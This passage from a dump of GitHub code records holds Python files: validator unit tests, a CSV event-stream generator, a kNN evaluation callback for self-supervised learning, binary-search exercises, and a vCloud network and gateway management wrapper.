({\"system\": {}}, \"'system' should not be empty.\"),\n ({\"system\": 42}, \"'system' has incorrect type.\"),\n ({\"system\": {\"test\": \"foo\"}}, \"'system' contains invalid keywords: test\"),\n ({\"system\": {\"platform\": 42}}, \"system/platform' has incorrect type.\"),\n ({\"system\": {\"os\": 42}}, \"system/os' has incorrect type.\"),\n ({\"system\": {\"arch\": 42}}, \"system/arch' has incorrect type.\"),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"invalid-keywords\",\n \"incorrect-platform\",\n \"incorrect-os\",\n \"incorrect-arch\",\n])\ndef test_validate_system_keyword_failed(value, message):\n \"\"\"Raise error when 'identifier' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_system_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_command_keyword():\n \"\"\"Validate 'command' keyword within data.\"\"\"\n wiz.validator.validate_command_keyword({})\n wiz.validator.validate_command_keyword({\"command\": {\"foo\": 
\"FooExe\"}})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"command\": {}}, {}, \"'command' should not be empty.\"),\n ({\"command\": 42}, {}, \"'command' has incorrect type.\"),\n (\n {\"command\": 42}, {\"variant_index\": 1},\n \"'variants/1/command' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_command_keyword_failed(value, options, message):\n \"\"\"Raise error when 'command' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_command_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_environ_keyword():\n \"\"\"Validate 'environ' keyword within data.\"\"\"\n wiz.validator.validate_environ_keyword({})\n wiz.validator.validate_environ_keyword({\"environ\": {\"key\": \"value\"}})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"environ\": {}}, {}, \"'environ' should not be empty.\"),\n ({\"environ\": 42}, {}, \"'environ' has incorrect type.\"),\n (\n {\"environ\": 42}, {\"variant_index\": 1},\n \"'variants/1/environ' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_environ_keyword_failed(value, options, message):\n \"\"\"Raise error when 'environ' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_environ_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_requirements_keyword():\n \"\"\"Validate 'requirements' keyword within data.\"\"\"\n wiz.validator.validate_requirements_keyword({})\n wiz.validator.validate_requirements_keyword({\"requirements\": [\"foo\"]})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"requirements\": []}, {}, \"'requirements' should not be empty.\"),\n ({\"requirements\": 42}, {}, \"'requirements' has incorrect type.\"),\n (\n {\"requirements\": 42}, {\"variant_index\": 1},\n \"'variants/1/requirements' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_requirements_keyword_failed(value, options, message):\n \"\"\"Raise error when 'requirements' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_requirements_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_conditions_keyword():\n \"\"\"Validate 'conditions' keyword within data.\"\"\"\n wiz.validator.validate_conditions_keyword({})\n wiz.validator.validate_conditions_keyword({\"conditions\": [\"foo\"]})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"conditions\": []}, \"'conditions' should not be empty.\"),\n ({\"conditions\": 42}, \"'conditions' has incorrect type.\"),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n])\ndef test_validate_conditions_keyword_failed(value, message):\n \"\"\"Raise error when 'conditions' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_conditions_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_variants_keyword():\n \"\"\"Validate 'variants' keyword within data.\"\"\"\n wiz.validator.validate_variants_keyword({})\n wiz.validator.validate_variants_keyword(\n {\n \"variants\": [\n {\n \"identifier\": \"foo\",\n \"install-location\": \"/path/to/install/location\",\n \"command\": {\"foo\": \"FooExe\"},\n \"environ\": {\"key\": \"value\"},\n \"requirements\": [\"foo >= 0.1.0\"]\n }\n ]\n }\n )\n\n\n@pytest.mark.parametrize(\"value, 
message\", [\n ({\"variants\": []}, \"'variants' should not be empty.\"),\n ({\"variants\": 42}, \"'variants' has incorrect type.\"),\n ({\"variants\": [42]}, \"'variants/0' has incorrect type.\"),\n ({\"variants\": [{\"A\": \"foo\"}]}, \"'variants/0' contains invalid keywords: A\"),\n ({\"variants\": [{}]}, \"'variants/0/identifier' is required.\"),\n (\n {\"variants\": [{\"identifier\": 42}]},\n \"'variants/0/identifier' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"install-location\": 42}]},\n \"'variants/0/install-location' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"command\": 42}]},\n \"'variants/0/command' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"environ\": 42}]},\n \"'variants/0/environ' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"requirements\": 42}]},\n \"'variants/0/requirements' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-incorrect-type\",\n \"variant-invalid-keywords\",\n \"variant-identifier-missing\",\n \"variant-identifier-incorrect\",\n \"variant-install-location-incorrect\",\n \"variant-command-incorrect\",\n \"variant-environ-incorrect\",\n \"variant-requirements-incorrect\",\n])\ndef test_validate_variants_keyword_failed(value, message):\n \"\"\"Raise error when 'variants' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_variants_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_keywords():\n \"\"\"Ensure that no invalid keywords are in data mapping.\"\"\"\n keywords = {\"A\", \"B\"}\n\n wiz.validator.validate_keywords({}, keywords)\n wiz.validator.validate_keywords({\"A\": \"foo\"}, keywords)\n wiz.validator.validate_keywords({\"A\": \"foo\", \"B\": \"bar\"}, keywords)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_keywords({\"A\": \"foo\", \"C\": \"bar\"}, keywords)\n\n assert \"Data contains invalid keywords: C\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_keywords({\"C\": \"bar\"}, keywords, label=\"'test'\")\n\n assert \"'test' contains invalid keywords: C\" in str(error)\n\n\ndef test_validate_required():\n \"\"\"Ensure that data exists.\"\"\"\n wiz.validator.validate_required(\"\")\n wiz.validator.validate_required(\"foo\")\n wiz.validator.validate_required(0)\n wiz.validator.validate_required(42)\n wiz.validator.validate_required(False)\n wiz.validator.validate_required(True)\n wiz.validator.validate_required([])\n wiz.validator.validate_required([1, 2, 3])\n wiz.validator.validate_required({})\n wiz.validator.validate_required({\"A\": \"foo\"})\n wiz.validator.validate_required({1, 2, 3})\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_required(None)\n\n assert \"Data is required.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_required(None, label=\"'test'\")\n\n assert \"'test' is required.\" in str(error)\n\n\ndef test_validate_type():\n \"\"\"Ensure that data has correct type.\"\"\"\n wiz.validator.validate_type(\"foo\", six.string_types)\n wiz.validator.validate_type(\"0.1.0\", six.string_types)\n wiz.validator.validate_type(42, int)\n wiz.validator.validate_type([1, 2, 3], list)\n wiz.validator.validate_type({\"A\": \"foo\"}, dict)\n wiz.validator.validate_type(True, bool)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_type(42, six.string_types)\n\n assert \"Data has 
incorrect type.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_type(42, six.string_types, label=\"'test'\")\n\n assert \"'test' has incorrect type.\" in str(error)\n\n\ndef test_validate_not_empty():\n \"\"\"Ensure that data container is not empty.\"\"\"\n wiz.validator.validate_not_empty({\"A\": \"foo\"})\n wiz.validator.validate_not_empty([1, 2, 3])\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_not_empty({})\n\n assert \"Data should not be empty.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_not_empty([], label=\"'test'\")\n\n assert \"'test' should not be empty.\" in str(error)\n","repo_name":"themill/wiz","sub_path":"test/unit/test_validator.py","file_name":"test_validator.py","file_ext":"py","file_size_in_byte":19973,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"43"} +{"seq_id":"72869279169","text":"import json\nfrom dataprep.data_source_manager import DataSourceManager\nimport pandas as pd\n\n\nclass ProcessRealtimeData:\n \"\"\"Class used to process, predict and yield plotting data for one point\n\n \"\"\"\n def __init__(self, csv_path, csv_filename, col_names):\n \"\"\"Class initializer (Constructor)\n\n :param csv_filename: File name ( including path ) of the optional csv file\n used as a data source\n :type: string\n :param csv_path: path to csv data\n :type: string\n :param col_names\n :type: list of string\n \"\"\"\n self.csv_filename = csv_filename\n self.csv_path = csv_path\n self.col_names = col_names\n\n\n def process_points(self):\n \"\"\"Process one point from the prediction data\n This function is a generator that yields messages back to client.\n The messages can be one of two types:\n (1) event: update\n (2) event: jobfinished\n The message 'event: update' contains a json object associated with the\n 'data:' key. The json object contains the prediction data as well as\n plotting data for two PC's (see self.__create_dict())\n An external data source generator (DataSourceManager.csv_line_reader())\n is used to retrieve prediction data one point at a time.\n :return: none NOTE: This class method is a generator, so there is no\n return. However it does yield a JSON serialized dictionary that contains\n the data for plotting the prediction graph\n \"\"\"\n\n # gen is a generator that is an iterable of dictionaries. 
Each dictionary\n # contains one row of prediction data including timestamp and sensor data\n gen = DataSourceManager.csv_line_reader(self.csv_path, self.csv_filename)\n\n while True:\n row = next(gen, None) # Get next row where row is a dictionary\n if row is None:\n # The value of this yield, when received by the client javascript,\n # will shut down the socket that is used for pushing the\n # prediction data.\n yield \"event: jobfinished\\ndata: \" + \"none\" + \"\\n\\n\"\n break # Terminate this event loop\n else:\n plot_dict = self.__create_plot_dict(row)\n dict_as_json = json.dumps(plot_dict)\n yield \"event: update\\ndata: \" + dict_as_json + \"\\n\\n\"\n\n def __create_plot_dict(self, one_row_dict):\n \"\"\"Private method to create a dictionary\n :param one_row_dict: One row as a DataFrame\n :type: dictionary\n :return: A dictionary of data that will be used for plotting the real time prediction\n \"\"\"\n # Get values of specified keys:\n sensor_values = [one_row_dict[x] for x in self.col_names]\n # Build new dict with specified col_names:\n plot_dict = dict(zip(self.col_names, sensor_values))\n\n return plot_dict\n\n","repo_name":"guiderae/WorkingDemos-RealTimeGraph1","sub_path":"dataprep/process_realtime_data.py","file_name":"process_realtime_data.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2632817010","text":"# https://github.com/PyTorchLightning/lightning-bolts/blob/0.3.0/pl_bolts/callbacks/knn_online.py#L17-L121\n# https://github.com/PatrickHua/SimSiam/blob/01d7e7811ac7b864bf8adccc8005208878208994/tools/knn_monitor.py\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom torch.utils.data import DataLoader\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nclass KNNOnlineEvaluator(Callback): # pragma: no cover\n \"\"\"\n Evaluates self-supervised K nearest neighbors.\n \n Example::\n \n # your model must have 1 attribute\n model = Model()\n model.num_classes = ... 
# the num of classes in the model\n \n online_eval = KNNOnlineEvaluator(\n num_classes=model.num_classes,\n )\n \n \"\"\"\n\n def __init__(\n self,\n mode: str,\n num_classes: Optional[int] = None,\n ) -> None:\n \"\"\"\n Args:\n num_classes: Number of classes\n \"\"\"\n \n super().__init__()\n \n self.mode = mode\n self.num_classes = num_classes\n \n self.knn_k = 200 # min(args.train.knn_k, len(memory_loader.dataset))\n self.knn_t = 0.1 \n \n def get_representations(self, pl_module: LightningModule, x: torch.Tensor) -> torch.Tensor:\n with torch.no_grad():\n representations = pl_module(x)\n representations = representations.reshape(representations.size(0), -1)\n return representations\n\n def get_all_representations(\n self, split,\n pl_module: LightningModule,\n dataloader: DataLoader,\n ) -> Tuple[np.ndarray, np.ndarray]:\n all_representations = None\n ys = None\n test = True if split in ['val', 'test'] else False\n \n for batch in dataloader:\n x, y = self.to_device(test=test, batch=batch, device=pl_module.device)\n\n with torch.no_grad():\n representations = F.normalize(self.get_representations(pl_module, x), dim=1)\n\n if all_representations is None:\n all_representations = representations.detach()\n else:\n all_representations = torch.cat([all_representations, representations.detach()])\n\n if ys is None:\n ys = y\n else:\n ys = torch.cat([ys, y])\n\n return all_representations.t().contiguous(), ys\n #return all_representations.cpu().numpy(), ys.cpu().numpy() # type: ignore[union-attr]\n \n def knn_monitor(self, split, pl_module, feature_bank, feature_labels, dataloader):\n pl_module.eval()\n \n total_top1, total_num = 0.0, 0\n test = True if split in ['val', 'test'] else False\n \n with torch.no_grad():\n # loop test data to predict the label by weighted knn search\n #test_bar = tqdm(test_data_loader, desc='kNN', disable=hide_progress)\n #for data, target in test_bar:\n # data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)\n \n for batch in dataloader:\n x, y = self.to_device(test=test, batch=batch, device=pl_module.device)\n \n feature = F.normalize(pl_module(x), dim=1)\n \n #feature = net(data)\n #feature = F.normalize(feature, dim=1)\n \n pred_labels = self.knn_predict(feature, feature_bank, feature_labels)\n\n total_num += x.size(0)\n total_top1 += (pred_labels[:, 0] == y).float().sum().item()\n #test_bar.set_postfix({'Accuracy':total_top1 / total_num * 100})\n return total_top1 / total_num\n \n def knn_predict(self, feature, feature_bank, feature_labels):\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=self.knn_k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(feature.size(0), -1), dim=-1, index=sim_indices)\n sim_weight = (sim_weight / self.knn_t).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(feature.size(0) * self.knn_k, self.num_classes, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(feature.size(0), -1, self.num_classes) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n return pred_labels\n\n def to_device(self, test: bool, batch: torch.Tensor, device: Union[str, torch.device]) -> Tuple[torch.Tensor, torch.Tensor]: \n #print(len(batch), batch)\n #print(len(batch))\n 
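# NOTE: `batch` is assumed to be an (inputs, target) pair from the\n        # DataLoader; in the contrastive modes handled below, `inputs` is a\n        # list of augmented views and only the first view goes to the device.\n        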
inputs, y = batch\n\n        if self.mode in ['simclr', 'simlwclr'] and (not test):\n            x = inputs[0]\n            x = x.to(device)\n            y = y.to(device)\n        else:\n            x = inputs.to(device)\n            y = y.to(device)\n\n        return x, y\n\n    '''\n    def on_validation_epoch_end(self, trainer: Trainer, pl_module: LightningModule) -> None:\n        pl_module.knn_evaluator = KNeighborsClassifier(n_neighbors=self.num_classes, n_jobs=-1)\n\n        val_dataloader = pl_module.val_dataloader()\n        representations, y = self.get_all_representations(pl_module, val_dataloader) # type: ignore[arg-type]\n\n        # knn fit\n        pl_module.knn_evaluator.fit(representations, y) # type: ignore[union-attr,operator]\n\n        # knn val acc\n        val_acc = pl_module.knn_evaluator.score(representations, y) # type: ignore[union-attr,operator]\n\n        # log metrics\n        pl_module.log('online_knn_val_acc', val_acc, on_step=False, on_epoch=True, sync_dist=True)\n    '''\n    \n    #'''\n    def on_validation_epoch_end(self, trainer: Trainer, pl_module: LightningModule) -> None:\n        \n        #train_dataloader = pl_module.train_dataloader()\n        val_dataloader = pl_module.val_dataloader()\n\n        representations_bank, y = self.get_all_representations(pl_module, val_dataloader)\n        val_acc = self.knn_monitor(split='val', pl_module=pl_module, feature_bank=representations_bank, feature_labels=y, dataloader=val_dataloader)\n\n        # log metrics\n        pl_module.log('online_knn_val_acc', val_acc, on_step=False, on_epoch=True, sync_dist=True)\n    #'''","repo_name":"arkel23/layerwiseclr","sub_path":"lwclr/models/online_knn_callback.py","file_name":"online_knn_callback.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"18651659409","text":"from typing import List\nimport bisect  # required by Solution_three below\n\n# Iterative solution, 240ms\nclass Solution_one:\n    def search(self, nums: List[int], target: int) -> int:\n        left, right = 0, len(nums)-1\n        while left <= right:\n            mid = left + (right-left) // 2\n            if nums[mid] == target:\n                return mid\n            elif nums[mid] < target:\n                left = mid + 1\n            else:\n                right = mid - 1\n        return -1\n\n\n# Recursive solution, 240ms\nclass Solution_two:\n    def search(self, nums: List[int], target: int) -> int:\n        def binary_search(left, right):\n            if left <= right:\n                mid = left + (right-left) // 2\n                \n                if nums[mid] < target:\n                    return binary_search(mid + 1, right)\n                elif nums[mid] > target:\n                    return binary_search(left, mid - 1)\n                else:\n                    return mid\n            else:\n                return -1 \n        \n        return binary_search(0, len(nums)-1)\n\n\n# Using the bisect (binary search) module, 236ms\nclass Solution_three:\n    def search(self, nums: List[int], target: int) -> int:\n        index = bisect.bisect_left(nums, target)\n        \n        if index < len(nums) and nums[index] == target:\n            return index\n        else:\n            return -1","repo_name":"leejy001/Algorithm","sub_path":"Python/Binary Search/leetcode_0704.py","file_name":"leetcode_0704.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"10416705831","text":"from pyvcloud.vcd.gateway import Gateway\nfrom pyvcloud.vcd.nat_rule import NatRule\nfrom pyvcloud.vcd.dhcp_pool import DhcpPool\nfrom pyvcloud.vcd.vdc_network import VdcNetwork\nfrom pyvcloud.vcd.firewall_rule import FirewallRule\nfrom pyvcloud.vcd.exceptions import EntityNotFoundException, NotFoundException\n\nfrom .base import VCloudResource\nfrom ..utils import underscore_to_camelcase\nfrom ..exceptions import VCloudSDKException\n\nDESTINATION = 'destination'\nSOURCE = 'source'\nGROUP_OBJECT_LIST = ['securitygroup', 'ipset', 'virtualmachine', 'network']\nVNIC_GROUP_LIST = ['gatewayinterface']\n\nADD_NAT_RULE_TEST_VALUE = {\n    'action': 'dnat',\n    'original_address': '10.10.4.2',\n    'translated_address': '11.11.4.2',\n    'description': 'nat rule test value',\n}\n\n
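# NOTE: ADD_NAT_RULE_TEST_VALUE mirrors the keyword arguments passed through\n# to pyvcloud's Gateway.add_nat_rule(); it is only a fallback default used by\n# VCloudGateway.create_nat_rule() below when no rule definition is supplied.\n\n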
class VCloudNetwork(VCloudResource):\n\n    def __init__(self,\n                 network_name,\n                 network_type,\n                 connection=None,\n                 vdc_name=None,\n                 vapp_name=None,\n                 kwargs=None):\n\n        self.network_name = network_name or kwargs.get('network_name')\n        self.network_type = network_type\n        self.kwargs = kwargs\n        if 'network_name' in self.kwargs:\n            del self.kwargs['network_name']\n        self._network = None\n\n        super().__init__(connection, vdc_name, vapp_name)\n\n    @property\n    def network(self):\n        if not self._network:\n            try:\n                self._network = self.get_network()\n            except EntityNotFoundException:\n                raise VCloudSDKException(\n                    'Network {name} has not been initialized.'.format(\n                        name=self.network_name))\n        return self._network\n\n    @property\n    def allocated_addresses(self):\n        return self.network.list_allocated_ip_address()\n\n    @property\n    def connected_vapps(self):\n        return self.network.list_connected_vapps()\n\n    def get_network(self, network_name=None, network_type=None):\n        if network_name and not network_type:\n            raise VCloudSDKException(\n                'The method get_network requires both network_name and '\n                'network_type parameters.')\n        elif not network_name and not self.network_name:\n            raise VCloudSDKException(\n                'The method get_network requires a network_name parameter if '\n                'self.network_name is not set.')\n\n        if not network_name:\n            network_name = self.network_name\n        if not network_type:\n            network_type = self.network_type\n\n        if network_type == 'routed_vdc_network':\n            network_resource = self.vdc.get_routed_orgvdc_network(\n                name=network_name)\n        elif network_type == 'isolated_vdc_network':\n            network_resource = self.vdc.get_isolated_orgvdc_network(\n                name=network_name)\n        elif network_type == 'directly_connected_vdc_network':\n            network_resource = self.vdc.get_direct_orgvdc_network(\n                name=network_name)\n        else:\n            raise VCloudSDKException(\n                'The property network_type {network_type} is not one of '\n                '[\\'routed_vdc_network\\', '\n                '\\'isolated_vdc_network\\', '\n                '\\'directly_connected_vdc_network\\', '\n                '\\'vapp_network\\']'.format(network_type=self.network_type))\n        return VdcNetwork(self.client, resource=network_resource)\n\n    def create(self):\n        if self.network_type == 'routed_vdc_network':\n            return self.vdc.create_routed_vdc_network(\n                network_name=self.network_name, **self.kwargs)\n        elif self.network_type == 'isolated_vdc_network':\n            return self.vdc.create_isolated_vdc_network(\n                network_name=self.network_name, **self.kwargs)\n        elif self.network_type == 'directly_connected_vdc_network':\n            return self.vdc.create_directly_connected_vdc_network(\n                network_name=self.network_name, **self.kwargs)\n        elif self.network_type == 'vapp_network':\n            if not self.vapp:\n                raise VCloudSDKException(\n                    'The property network_type is vapp_network, '\n                    'but a vapp was not provided.')\n            return self.vapp.create_vapp_network(\n                name=self.network_name, **self.kwargs)\n        else:\n            raise VCloudSDKException(\n                'The property network_type {network_type} is not one of '\n                '[\\'routed_vdc_network\\', '\n                '\\'isolated_vdc_network\\', '\n                '\\'directly_connected_vdc_network\\', '\n                '\\'vapp_network\\']'.format(network_type=self.network_type))\n
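\n    # NOTE: the pyvcloud create_*/delete_* calls dispatched above are assumed\n    # to return a task resource; a caller would typically block on it, as in\n    # this sketch ('net' and 'client' are illustrative names):\n    #   task = net.create()\n    #   client.get_task_monitor().wait_for_success(task)\n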
\n    def delete(self):\n        if self.network_type == 'routed_vdc_network':\n            return self.vdc.delete_routed_orgvdc_network(self.network_name)\n        elif self.network_type == 'isolated_vdc_network':\n            return self.vdc.delete_isolated_orgvdc_network(self.network_name)\n        elif self.network_type == 'directly_connected_vdc_network':\n            return self.vdc.delete_direct_orgvdc_network(self.network_name)\n        elif self.network_type == 'vapp_network':\n            if not self.vapp:\n                raise VCloudSDKException(\n                    'The property network_type is vapp_network, '\n                    'but a vapp was not provided.')\n            return self.vapp.delete_vapp_network(self.network_name)\n        else:\n            raise VCloudSDKException(\n                'The property network_type {network_type} is not one of '\n                '[\\'routed_vdc_network\\', '\n                '\\'isolated_vdc_network\\', '\n                '\\'directly_connected_vdc_network\\', '\n                '\\'vapp_network\\']'.format(network_type=self.network_type))\n\n    def add_static_ip_pool_and_dns(self, **kwargs):\n        return self.network.add_static_ip_pool_and_dns(**kwargs)\n\n    def modify_static_ip_pool(self, **kwargs):\n        return self.network.modify_static_ip_pool(**kwargs)\n\n    def remove_static_ip_pool(self, **kwargs):\n        # delegate to the underlying VdcNetwork; calling this method on self\n        # would recurse forever\n        return self.network.remove_static_ip_pool(**kwargs)\n\n\nclass VCloudGateway(VCloudResource):\n\n    def __init__(self,\n                 gateway_name,\n                 connection=None,\n                 vdc_name=None,\n                 kwargs=None):\n\n        self.gateway_name = gateway_name\n        self.kwargs = kwargs\n        self._gateway = None\n\n        super().__init__(connection, vdc_name)\n\n    @property\n    def gateway(self):\n        if self._gateway:\n            self._gateway.reload()\n        else:\n            self._gateway = self.get_gateway()\n        return self._gateway\n\n    @property\n    def firewall_rules(self):\n        return self.gateway.get_firewall_rules_list()\n\n    @property\n    def firewall_objects(self):\n        firewall_objects = {DESTINATION: {}, SOURCE: {}}\n        for direction in firewall_objects.keys():\n            for group_key in GROUP_OBJECT_LIST + VNIC_GROUP_LIST:\n                firewall_objects[direction][group_key] = \\\n                    self.gateway.list_firewall_objects(direction, group_key)\n        return firewall_objects\n\n    @property\n    def static_routes(self):\n        result = self.gateway.get_static_routes()\n        return result.items()\n\n    @property\n    def nat_rules(self):\n        return self.gateway.list_nat_rules()\n\n    @property\n    def dhcp_pools(self):\n        out_list = []\n        dhcp_resource = self.gateway.get_dhcp()\n        if hasattr(dhcp_resource.ipPools, 'ipPool'):\n            for ip_pool in dhcp_resource.ipPools.ipPool:\n                out_list.append(ip_pool)\n        return out_list\n\n    @property\n    def dhcp_binding(self):\n        return self.gateway.list_dhcp_binding()\n\n    @property\n    def ca_certificates(self):\n        return self.gateway.list_ca_certificates()\n\n    @property\n    def crl_certificates(self):\n        return self.gateway.list_crl_certificates()\n\n    @property\n    def external_network_ip_allocations(self):\n        return self.gateway.list_external_network_ip_allocations()\n\n    @property\n    def exposed_data(self):\n        return {\n            'dhcp_pools': self.dhcp_pools,\n            'dhcp_binding': self.dhcp_binding,\n            'crl_certificates': self.crl_certificates,\n            'ca_certificates': self.ca_certificates,\n            'nat_rules': self.nat_rules,\n            'static_routes': self.static_routes,\n            'firewall_rules': self.firewall_rules,\n            'firewall_objects': self.firewall_objects\n        }\n\n\n    def get_gateway(self, gateway_name=None):\n        gateway_name = gateway_name or self.gateway_name\n        gateway_resource = self.vdc.get_gateway(gateway_name)\n        return Gateway(self.client, resource=gateway_resource)\n\n    # FIREWALLS\n    def create_firewall_rule(self,\n                             rule_name,\n                             _type='User',\n                             source_values=None,\n                             destination_values=None,\n                             services=None,\n                             action='accept',\n                             enabled=True,\n                             logging_enabled=False,\n                             **kwargs):\n\n        # pyvcloud's keyword is 'type'; the leading underscore avoids\n        # shadowing the Python builtin of the same name.\n        _type = kwargs.get('type', _type)\n        before_rules = 
self.get_list_of_rule_ids()\n self.gateway.add_firewall_rule(\n rule_name, action, _type, enabled, logging_enabled)\n new_rule = self.infer_rule(rule_name, before_rules)\n new_rule.edit(source_values, destination_values, services)\n return new_rule.info_firewall_rule()\n\n def delete_firewall_rule(self, rule_name, rule_id):\n firewall_rule = self.infer_rule(rule_name, [rule_id], match=True)\n firewall_rule.delete()\n\n def get_list_of_rule_ids(self):\n all_rules = []\n for firewall_rules in self.gateway.get_firewall_rules():\n for firewall_rule in firewall_rules.firewallRules.firewallRule:\n all_rules.append(firewall_rule.id)\n return all_rules\n\n def infer_rule(self, rule_name, rule_ids=None, match=False):\n for firewall_rule_id in self.get_list_of_rule_ids():\n if not match and firewall_rule_id not in rule_ids:\n rule = FirewallRule(self.client,\n self.gateway_name,\n resource_id=firewall_rule_id)\n rule._reload()\n if rule_name == rule.resource.name:\n return rule\n elif match and firewall_rule_id in rule_ids:\n rule = FirewallRule(self.client,\n self.gateway_name,\n resource_id=firewall_rule_id)\n rule._reload()\n if rule_name == rule.resource.name:\n return rule\n\n # NATS\n def create_nat_rule(self, nat_definition=None):\n nat_definition = nat_definition or ADD_NAT_RULE_TEST_VALUE\n self.gateway.add_nat_rule(**nat_definition)\n return self.get_nat_rule_from_definition(nat_definition)\n\n def delete_nat_rule(self, nat_id=None, nat_definition=None):\n nat_rule = None\n if nat_definition:\n nat_rule = self.get_nat_rule_from_definition(nat_definition)\n elif nat_id:\n nat_rule = NatRule(self.client, self.gateway_name, rule_id=nat_id)\n elif not nat_rule:\n raise VCloudSDKException(\n 'Unable to find nat rule for deletion, because neither '\n 'nat_id {nat_id}, nor nat_definition {definition} '\n 'resolved to any known rules for gateway {gateway}.'.format(\n nat_id=nat_id,\n definition=nat_definition,\n gateway=self.gateway_name))\n return nat_rule.delete_nat_rule()\n\n def get_nat_rule_from_definition(self, nat_definition):\n for rule in self.gateway.list_nat_rules():\n nat_rule = NatRule(\n self.client, self.gateway_name, rule_id=rule['ID'])\n if self.compare_nat_rule(nat_rule.get_nat_rule_info(), nat_definition):\n return nat_rule.get_nat_rule_info()\n return {}\n\n @staticmethod\n def compare_nat_rule(rule_info, definition):\n for k, v in definition.items():\n if k == 'ID':\n continue\n if rule_info[underscore_to_camelcase(k)] != v:\n return False\n return True\n\n # DHCP POOLS\n def add_dhcp_pool(self, **pool_definition):\n self.gateway.add_dhcp_pool(**pool_definition)\n ip_pool = self.get_dhcp_pool_from_ip_range(\n pool_definition.get('ip_range'))\n return ip_pool.get_pool_info()\n\n def delete_dhcp_pool(self, **pool_definition):\n ip_pool = self.get_dhcp_pool_from_ip_range(\n pool_definition.get('ip_range'))\n return ip_pool.delete_pool()\n\n def get_dhcp_pool_from_ip_range(self, ip_range):\n for dhcp_pool in self.dhcp_pools:\n if dhcp_pool.ipRange == ip_range:\n return DhcpPool(self.client,\n self.gateway_name,\n resource_id=dhcp_pool.poolId)\n\n # DHCP BINDINGS\n # def add_dchp_binding(self, **binding_definition):\n # return self.gateway.add_dhcp_binding(**binding_definition)\n #\n","repo_name":"EarthmanT/cloudify-vcd-plugin","sub_path":"vcd_plugin_sdk/resources/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":13423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17133342712","text":"# -*- 
